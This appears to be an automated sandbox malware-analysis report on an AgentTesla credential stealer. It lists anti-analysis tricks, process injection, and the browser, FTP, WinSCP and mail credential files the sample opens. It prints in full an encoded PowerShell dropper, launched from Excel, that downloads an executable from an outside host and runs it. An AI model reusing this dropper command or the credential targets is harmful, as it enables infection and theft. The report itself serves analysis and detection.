Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\tNDFx.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\tNDFx.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\tNDFx.exe

Window / User API: threadDelayed 9628

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2512	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 3044	Thread sleep time: -360000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1776	Thread sleep time: -12912720851596678s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1776	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1484	Thread sleep count: 9628 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1484	Thread sleep count: 70 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1776	Thread sleep count: 126 > 30			Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\tNDFx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Enumerates the file system

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: tNDFx.exe, 00000006.00000002.2134184751.00000000058E8000.00000004.00000001.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Queries a list of all running processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to hide a thread from the debugger

Source: C:\Users\user\AppData\Roaming\tNDFx.exe

Code function: 6_2_001E9FDC NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,001EA6BF,00000000,00000000

6_2_001E9FDC

Hides threads from debuggers

Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Thread information set: HideFromDebugger			Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process queried: DebugPort			Jump to behavior

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process token adjusted: Debug			Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\AppData\Roaming\tNDFx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Yara detected Powershell download and execute

Source: Yara match	File source: 00000004.00000002.2109712096.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1320, type: MEMORY

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded (New-Object Net.WebClient).DownloadFile('http://specfloors.net/dev/income.exe',($env:appdata)+'\tNDFx.exe');Start-Sleep 2; Start-Process $env:appdata\tNDFx.exe
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded (New-Object Net.WebClient).DownloadFile('http://specfloors.net/dev/income.exe',($env:appdata)+'\tNDFx.exe');Start-Sleep 2; Start-Process $env:appdata\tNDFx.exe			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\tNDFx.exe

Memory written: C:\Users\user\AppData\Roaming\tNDFx.exe base: 400000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\tNDFx.exe 'C:\Users\user\AppData\Roaming\tNDFx.exe'			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1			Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: tNDFx.exe, 0000000B.00000002.2351497719.0000000000C20000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: tNDFx.exe, 0000000B.00000002.2351497719.0000000000C20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: tNDFx.exe, 0000000B.00000002.2351497719.0000000000C20000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Queries volume information: C:\Users\user\AppData\Roaming\tNDFx.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Queries volume information: C:\Users\user\AppData\Roaming\tNDFx.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\user\AppData\Roaming\tNDFx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Source: Yara match	File source: 0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2351624860.000000000221A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2134883837.0000000006A8F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tNDFx.exe PID: 2484, type: MEMORY
Source: Yara match	File source: Process Memory Space: tNDFx.exe PID: 2288, type: MEMORY
Source: Yara match	File source: 6.2.tNDFx.exe.6a8f2b8.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tNDFx.exe.6ac52d8.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.tNDFx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tNDFx.exe.6ac52d8.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tNDFx.exe.6a8f2b8.17.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Roaming\tNDFx.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\tNDFx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\tNDFx.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Users\user\AppData\Roaming\tNDFx.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tNDFx.exe PID: 2484, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Source: Yara match	File source: 0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2351624860.000000000221A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2134883837.0000000006A8F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tNDFx.exe PID: 2484, type: MEMORY
Source: Yara match	File source: Process Memory Space: tNDFx.exe PID: 2288, type: MEMORY
Source: Yara match	File source: 6.2.tNDFx.exe.6a8f2b8.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tNDFx.exe.6ac52d8.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.tNDFx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tNDFx.exe.6ac52d8.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tNDFx.exe.6a8f2b8.17.raw.unpack, type: UNPACKEDPE